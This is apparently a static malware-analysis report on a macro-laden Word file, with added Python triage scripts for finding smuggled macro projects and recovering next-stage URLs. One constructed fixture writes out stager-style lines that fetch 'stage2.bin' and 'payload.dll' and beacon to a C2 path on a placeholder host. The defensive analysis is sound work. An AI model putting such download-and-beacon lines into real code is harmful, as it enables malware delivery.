Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 9ba7be41a17ce463…

MALICIOUS

Office (OOXML)

Size: 10.52 MB
Created: 2017-05-26 03:08:00 UTC
Authoring application: Microsoft Office Word 15.0000
First seen: 2021-01-23
MD5: eb13e957191ebbec67571a0bbe515080
SHA-1: 7c7865ee6aaf97b4d09ee43b960530e8c85760df
SHA-256: 9ba7be41a17ce463912d606761d3c987d86f0e98af54c3ec6f084ce0e626420c
Risk score: 94

Heuristics (6)

  • Embedded Office object carries macros [critical] OFFICE_EMBEDDED_MACRO_OBJECT
    This document embeds a second Office file that itself contains a VBA macro project or an Excel 4.0 (XLM) macro sheet. Hiding a macro-bearing workbook or document inside another document, often under an obfuscated or non-standard part name, is a macro-smuggling technique that defeats scanners which only inspect the outer document's own macro storage (vbaProject.bin in an OOXML package, the VBA storage in a legacy .doc/.xls). Benign documents do embed other Office files, but a macro project carried inside an embedded object is rarely the product of a normal authoring workflow, so the embedded object must be examined on its content rather than trusted on its name. Here the embedded legacy parts carry Word's default names for inserted objects (Microsoft_Word_97_-_2003_Document1.doc, Microsoft_Excel_97-2003_Worksheet2.xls; see Extracted artifacts), so name obfuscation is not in play; which embedded part holds the macro project, and what the macros do, is not shown in this report and should be confirmed by dumping the project from the carved parts (olevba or oledump.py).
  • Embedded OLE object [medium] OOXML_OLE_OBJECT
    Document contains embedded OLE objects: the five word/embeddings/ parts (three oleObjectN.bin parts, one legacy .doc and one legacy .xls) are carved and listed under Extracted artifacts.
  • External hyperlinks (38) [low] OOXML_EXTERNAL_HYPERLINKS
    Document contains 38 external hyperlinks; clickable URLs are stored as external relationships. First target: http://en.wikipedia.org/wiki/Formaldehyde
  • Payload URL recovered from embedded OLE object (11 URLs) [info] OOXML_EMBEDDED_OBJECT_URL
    An embedded OLE object (an xl/, word/ or ppt/ embeddings part) carries a next-stage download URL in its Ole10Native or Package stream, stored literally (ASCII or UTF-16) or base64-encoded, where a URL sweep of the package's XML parts does not reach. The recovered URLs are surfaced as IOCs; the rule matches URL syntax inside the stream and does not confirm that a target actually serves a payload, so each of the 11 URLs needs individual review before it is treated as a download host.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://www.em.azcollaboration.com/Operations/biologics/GlobalEng/ProjProcess/_layouts/DocIdRedir.aspx?ID=GENG-42-266  [In document text (OOXML body / shared strings)]
    • http://www.dbp.org.uk/cs/DBP00207.pdf  [In document text (OOXML body / shared strings)]
    • https://www.em.azcollaboration.com/Operations/biologics/GlobalEng/BuiltEnv/_layouts/DocIdRedir.aspx?ID=GENG-91-43  [In document text (OOXML body / shared strings)]
    • http://www.breeam.org/  [In document text (OOXML body / shared strings)]
    • https://www.em.azcollaboration.com/Operations/EssExt/eng/TPS/00_PM_ALL/2 Pancras Square Sustainability Checklist.xls  [Document hyperlink]
    • https://www.em.azcollaboration.com/Operations/EssExt/eng/TPS/00_PM_ALL/2 Pancras Ergonomics Checklist.docx  [Document hyperlink]
    • http://schemas.open (truncated string; trailing bytes undecodable)  [In document text (OOXML body / shared strings)]
    • http://schemas.micrP (truncated string)  [In document text (OOXML body / shared strings)]
    • http://schemas.micrW (truncated string)  [In document text (OOXML body / shared strings)]
    • http://portalapps.is.astrazeneca.net/azgard-components/ldms-documents/global_she/effective/Global  [In document text (OOXML body / shared strings)]
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.1b34afba7cd5b0e1128ba51010108a0c/?vgnextoid=df95e973c8212210VgnVCM2000003401920aRCRD  [In document text (OOXML body / shared strings)]
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.1b34afba7cd5b0e1128ba51010108a0c/?vgnextoid=ebc27f2330562210VgnVCM1000003301920aRCRD  [In document text (OOXML body / shared strings)]
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.1a05ec339a64a0e1128ba51010108a0c/?vgnextoid=e61402d897951210VgnVCM2000003401920aRCRD  [In document text (OOXML body / shared strings)]
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.1a05ec339a64a0e1128ba51010108a0c/?vgnextoid=e61402d897951210VgnVCM2000003401920aRCRDZ  [In document text (OOXML body / shared strings)]
    • http://www.usgbc.org/DisplayPage.aspx?CategoryID=19  [In document text (OOXML body / shared strings)]
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.1b34afba7cd5b0e1128ba51010108a0c/?vgnextoid=2d027f2330562210VgnVCM1000003301920aRCRD  [In document text (OOXML body / shared strings)]
    • http://en.wikipedia.org/wiki/Formaldehyde  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Chlorobenzenes  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Lead  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Polyvinyl_chloride  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Creosote  [Document hyperlink]
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.973a3a2a8d5bd1f5e8a77d1010108a0c/?vgnextoid=c457a102f7b5d210VgnVCM2000003401920aRCRD  [Document hyperlink]
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.973a3a2a8d5bd1f5e8a77d1010108a0c/?vgnextoid=ddbe87c77da5d210VgnVCM1000003301920aRCRD  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Bisphenol_A  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Chlorodifluoromethane  [Document hyperlink]
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.973a3a2a8d5bd1f5e8a77d1010108a0c/?vgnextoid=66eb4c50a865d210VgnVCM2000003401920aRCRD  [Document hyperlink]
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.973a3a2a8d5bd1f5e8a77d1010108a0c/?vgnextoid=f86881b2b4b5d210VgnVCM1000003301920aRCRD  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Hypalon  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Chromium_VI  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Flame_retardant  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Perfluorinated_compound  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Volatile_organic_compounds  [Document hyperlink]
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.973a3a2a8d5bd1f5e8a77d1010108a0c/?vgnextoid=aedb91aa9cb5d210VgnVCM2000003401920aRCRD  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Asbestos  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Neoprene  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Chlorinated_paraffins  [Document hyperlink]
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.973a3a2a8d5bd1f5e8a77d1010108a0c/?vgnextoid=029af3a51832e210VgnVCM1000003301920aRCRD  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Polyethylene  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Polychlorinated_biphenyls  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Pentachlorophenol  [Document hyperlink]
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.973a3a2a8d5bd1f5e8a77d1010108a0c/?vgnextoid=0259f3a51832e210VgnVCM1000003301920aRCRD  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Alkylphenols  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Cadmium  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Chloroprene  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Mercury_(element  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Polyvinylidene_chloride  [Document hyperlink]
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.973a3a2a8d5bd1f5e8a77d1010108a0c/?vgnextoid=24ea6e8c4d55d210VgnVCM1000003301920aRCRD  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Arsenic  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Chlorofluorocarbons  [Document hyperlink]
    • http://en.wikipedia.org/wiki/Chlorinated_polyvinyl_chloride  [Document hyperlink]
    +32 more URL(s)
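The macro-smuggling and embedded-object heuristics above (OFFICE_EMBEDDED_MACRO_OBJECT, OOXML_OLE_OBJECT) describe a check that is straightforward to reproduce on a sample. The script below is an added example written for this page, not the scanner's own code: it walks an OOXML package, recurses into every */embeddings/ part, and flags nested OOXML packages that carry vbaProject.bin or an xl/macrosheets/ part, as well as legacy compound-file (CFB) embeddings whose directory holds a VBA project storage. The sample .docx, its embedded objects, the minimal CFB builder and the storage-name list are constructed fixtures that mirror the part names listed under Extracted artifacts; in production you would point olevba or oledump.py at the carved parts instead of the hand-rolled CFB reader.

```python
"""Walk an OOXML package for smuggled macro projects. Added example, not the
report tool's own code. Flags nested OOXML embeddings that carry vbaProject.bin
or an xl/macrosheets/ part (Excel 4.0 / XLM) and legacy compound-file (CFB)
embeddings whose directory holds a VBA project storage. The sample .docx, its
embedded objects and the minimal CFB builder are constructed fixtures."""
import io
import re
import struct
import zipfile

CFB_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
ZIP_MAGIC = b"PK\x03\x04"
# Storage names that only exist when a CFB-based Office file has a VBA project.
VBA_DIR_NAMES = {"_VBA_PROJECT_CUR", "_VBA_PROJECT", "VBA", "Macros"}


def cfb_directory_names(blob):
    """Entry names of a compound file: header -> DIFAT (first 109 slots) -> FAT
    -> directory sector chain. olefile does this in production; the walk is
    spelled out here so the check is explicit."""
    if len(blob) < 512:
        return []
    ssz = 1 << struct.unpack_from("<H", blob, 30)[0]
    first_dir = struct.unpack_from("<I", blob, 48)[0]
    fat = []
    for sec in struct.unpack_from("<109I", blob, 76):
        off = (sec + 1) * ssz
        if sec > 0xFFFFFFFA or off + ssz > len(blob):    # free slot or truncated
            break
        fat += struct.unpack_from("<%dI" % (ssz // 4), blob, off)
    names, sec, seen = [], first_dir, set()
    while sec <= 0xFFFFFFFA and sec not in seen:          # ENDOFCHAIN ends the walk
        seen.add(sec)
        off = (sec + 1) * ssz
        if off + ssz > len(blob):
            break
        for e in range(off, off + ssz, 128):
            name_len, kind = struct.unpack_from("<HB", blob, e + 64)
            if kind and name_len >= 2:                     # kind 0 = unused entry
                names.append(blob[e:e + name_len - 2].decode("utf-16-le"))
        sec = fat[sec] if sec < len(fat) else 0xFFFFFFFE
    return names


def macro_parts(data, where="<root>"):
    """(location, reason) for every part carrying a macro project. Recurses into
    */embeddings/* so a finding stays attributed to the part that smuggled it."""
    findings = []
    if data.startswith(CFB_MAGIC):
        hits = sorted(VBA_DIR_NAMES & set(cfb_directory_names(data)))
        if hits:
            findings.append((where, "CFB storage " + ",".join(hits)))
        return findings
    if not data.startswith(ZIP_MAGIC):
        return findings
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            lname = name.lower()
            if lname.endswith("vbaproject.bin"):
                findings.append((where + "/" + name, "VBA project part"))
            elif re.match(r"xl/macrosheets/.*\.xml$", lname):
                findings.append((where + "/" + name, "Excel 4.0 macro sheet"))
            elif "/embeddings/" in lname:
                findings += macro_parts(zf.read(name), where + "/" + name)
    return findings


def build_cfb(storage_names):
    """Constructed fixture: minimal v3 compound file with 512-byte sectors, the
    FAT in sector 0 and one directory sector (Root Entry + up to 3 storages)."""
    hdr = CFB_MAGIC + b"\x00" * 16 + struct.pack(
        "<HHHHH6sIIIIIIIII", 0x3E, 3, 0xFFFE, 9, 6, b"", 0, 1, 1, 0, 4096,
        0xFFFFFFFE, 0, 0xFFFFFFFE, 0) + struct.pack("<I", 0) + b"\xFF" * 432
    fat = struct.pack("<II", 0xFFFFFFFD, 0xFFFFFFFE) + b"\xFF" * 504
    directory = b""
    for name, kind in [("Root Entry", 5)] + [(n, 1) for n in storage_names]:
        raw = name.encode("utf-16-le") + b"\x00\x00"
        directory += raw.ljust(64, b"\x00") + struct.pack("<HBB", len(raw), kind, 1)
        directory += b"\xFF" * 12 + b"\x00" * 48   # no siblings/child; zero CLSID, size
    return hdr + fat + directory.ljust(512, b"\x00")


def zip_bytes(parts):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in parts.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_sample_docx():
    """Constructed .docx mirroring this report's layout: a legacy .xls with a VBA
    storage, an .xlsm with an XLM sheet under a generic name, one clean object."""
    smuggled_xlsm = zip_bytes({"xl/workbook.xml": b"<workbook/>",
                               "xl/macrosheets/sheet1.xml": b"<macrosheet/>"})
    return zip_bytes({
        "[Content_Types].xml": b"<Types/>",
        "word/document.xml": b"<document/>",
        "word/embeddings/Microsoft_Excel_97-2003_Worksheet2.xls":
            build_cfb(["Workbook", "_VBA_PROJECT_CUR"]),
        "word/embeddings/oleObject1.bin": build_cfb(["\x01Ole10Native"]),
        "word/embeddings/oleObject2.bin": smuggled_xlsm,
    })
```

Calling macro_parts(build_sample_docx()) on the fixture returns two findings: the legacy .xls is reported through its _VBA_PROJECT_CUR storage, and the XLM sheet is reported with the full nested path (oleObject2.bin/xl/macrosheets/sheet1.xml), while the clean Ole10Native object produces nothing. A real triage run would also open each CFB hit with oledump.py or olevba to read the macro source rather than stopping at the storage name.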

Extracted artifacts (10)

Files carved from inside the sample during analysis. Each entry lists the carved filename, kind, source part, size and SHA-256, followed by any per-artifact detection results. High entropy on a carved OLE part means its contents are compressed or encrypted; that fits a packed payload but also a nested zip-based package or embedded image data, so identify the stream contents before reading the entropy figure as malicious on its own.
ooxml_oleobject_00.bin
  Kind: ooxml-ole-object
  Source: OOXML embedded OLE part word/embeddings/oleObject3.bin
  Size: 141312 bytes
  SHA-256: d0e8981e6e0fd5d3c8eaba37c4dd1535182296386ff29bce6e379fbe217f1b24
  Detection: ClamAV: No threats found
  Obfuscation or payload: likely (carved artifact entropy is 7.87, consistent with packed or encrypted content)
ooxml_oleobject_01.bin
  Kind: ooxml-ole-object
  Source: OOXML embedded OLE part word/embeddings/oleObject1.bin
  Size: 8388608 bytes (exactly 8 MiB)
  SHA-256: bc74956cfa6dcbfdd707ca7f3520c0bfcaf9ec6261e3d55e7e0e9bb04c93cb12
ooxml_oleobject_02.bin
  Kind: ooxml-ole-object
  Source: OOXML embedded OLE part word/embeddings/oleObject2.bin
  Size: 299520 bytes
  SHA-256: 95c6656fac02e54f58136503ea376b046c23f030db5e137b565a6e8ba614517c
  Detection: ClamAV: No threats found
  Obfuscation or payload: likely (carved artifact entropy is 7.95, consistent with packed or encrypted content)
ooxml_oleobject_03.bin
  Kind: ooxml-ole-object
  Source: OOXML embedded OLE part word/embeddings/Microsoft_Word_97_-_2003_Document1.doc
  Size: 1281536 bytes
  SHA-256: 8c9b867da120fb7eb24a207baddb0c2b072df30809e64f85868b58e2a4986c51
ooxml_oleobject_04.bin
  Kind: ooxml-ole-object
  Source: OOXML embedded OLE part word/embeddings/Microsoft_Excel_97-2003_Worksheet2.xls
  Size: 497664 bytes
  SHA-256: 37ae938d1035e1f1af4c043faf54a2b6e8cd0a8caa49c870b6189623d8612879
emf_00.emf
  Kind: ooxml-emf
  Source: OOXML EMF part word/media/image3.emf
  Size: 5528 bytes
  SHA-256: 0475388c52e1561c740f7620fc016657c7554107a90e1fcd1d5720571029fc1e
emf_01.emf
  Kind: ooxml-emf
  Source: OOXML EMF part word/media/image4.emf
  Size: 5452 bytes
  SHA-256: 34492bca044ed8f1efe90d5a1762f78a98852bf24773d281365c2e148dfc20b7
emf_02.emf
  Kind: ooxml-emf
  Source: OOXML EMF part word/media/image5.emf
  Size: 1504468 bytes
  SHA-256: 301fffc17f9c8a6c6305ca75e50573ffa84b25732c9f87f5af47a21d6a25990d
emf_03.emf
  Kind: ooxml-emf
  Source: OOXML EMF part word/media/image7.emf
  Size: 5600 bytes
  SHA-256: 7f3a25e3d95587c524a01d4f4c93a213d98669fcfa01f30bf39c0bda2e576b74
emf_04.emf
  Kind: ooxml-emf
  Source: OOXML EMF part word/media/image6.emf
  Size: 5400 bytes
  SHA-256: daddfd551be27e7890477b7cdf1cb01edc79433d6c050ae85886feed22f88afe
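The OOXML_EMBEDDED_OBJECT_URL heuristic and the entropy figures quoted on the carved OLE parts both come down to operations on a carved stream. The script below is an added example, not the report tool's code, that shows both: a Shannon entropy in bits per byte (the scale on which 7.87 and 7.95 are reported above), and an Ole10Native parser that extracts the packaged payload and sweeps it for URLs stored as ASCII, as UTF-16LE, or inside base64 runs. The stream layout is the one oletools' OleNativeStream parses; the sample stream, its stager-like text and the example.invalid hosts are constructed and carry no real payload.

```python
"""Triage of a carved OLE embedding: entropy and next-stage URL recovery.
Added example, not the report tool's own code. shannon_entropy() gives the
bits-per-byte figure this report quotes for carved parts; parse_ole10native()
splits a packager (Ole10Native) stream into its fields and recover_urls()
sweeps the packaged payload for URLs stored as ASCII, UTF-16LE or inside
base64 runs. The sample stream and its example.invalid URLs are constructed."""
import base64
import math
import re
import struct
from collections import Counter

URL_CHARS = rb"A-Za-z0-9._~:/?#@!$&'()*+,;=%-"
URL_RE = re.compile(rb"https?://[" + URL_CHARS + rb"]{4,}")
# Same URL shape with a NUL after every byte, i.e. UTF-16LE text.
U16_URL_RE = re.compile(rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00"
                        rb"(?:[" + URL_CHARS + rb"]\x00){4,}")
B64_RE = re.compile(rb"[A-Za-z0-9+/]{24,}={0,2}")


def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant run, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_ole10native(stream):
    """Fields of an Ole10Native stream, in the layout oletools' OleNativeStream
    reads: total size, flags, label, source path, two DWORDs, temp path,
    payload size, payload."""
    total, _flags = struct.unpack_from("<IH", stream, 0)
    if total + 4 > len(stream):
        raise ValueError("truncated Ole10Native stream")

    def cstring(pos):
        end = stream.index(b"\x00", pos)
        return stream[pos:end].decode("latin-1"), end + 1

    label, pos = cstring(6)
    src_path, pos = cstring(pos)
    pos += 8                      # flags word pair and temp-path length, unused here
    temp_path, pos = cstring(pos)
    size = struct.unpack_from("<I", stream, pos)[0]
    return {"label": label, "src_path": src_path, "temp_path": temp_path,
            "payload": stream[pos + 4:pos + 4 + size]}


def _literal_urls(blob):
    """URLs stored as ASCII or as UTF-16LE text."""
    urls = {m.group(0).decode("ascii") for m in URL_RE.finditer(blob)}
    urls |= {m.group(0).decode("utf-16-le") for m in U16_URL_RE.finditer(blob)}
    return urls


def recover_urls(blob):
    """Literal URLs plus any hidden inside base64 runs, as a sorted list."""
    found = _literal_urls(blob)
    for m in B64_RE.finditer(blob):
        try:
            decoded = base64.b64decode(m.group(0), validate=True)
        except ValueError:        # binascii.Error is a ValueError: not real base64
            continue
        found |= _literal_urls(decoded)
    return sorted(found)


def build_ole10native(label, payload):
    """Constructed fixture: pack `payload` in the Ole10Native layout above."""
    temp = b"C:\\Temp\\" + label.encode() + b"\x00"
    body = struct.pack("<H", 2) + label.encode() + b"\x00" + label.encode() + b"\x00"
    body += struct.pack("<II", 0x00030000, len(temp)) + temp
    body += struct.pack("<I", len(payload)) + payload
    return struct.pack("<I", len(body)) + body


# Constructed stager text: one ASCII URL, one UTF-16LE URL, one base64 URL.
SAMPLE_PAYLOAD = (
    b'u = "https://example.invalid/c2/beacon"\r\n'
    + 'x.Open "GET", "http://example.invalid/stage2.bin", False\r\n'.encode("utf-16-le")
    + b"' " + base64.b64encode(b"https://example.invalid/fallback/payload.dll") + b"\r\n"
)

if __name__ == "__main__":
    rec = parse_ole10native(build_ole10native("stage.vbs", SAMPLE_PAYLOAD))
    print("label=%s entropy=%.2f" % (rec["label"], shannon_entropy(rec["payload"])))
    for url in recover_urls(rec["payload"]):
        print("  url:", url)
```

Run stand-alone, the script recovers all three constructed URLs from the packaged payload, including the one that a plain ASCII string search would miss (UTF-16LE) and the one hidden in base64. On a real carved part the same calls apply to the \x01Ole10Native stream read from the compound file with olefile; the entropy figure is computed over the raw carved bytes, as the report does.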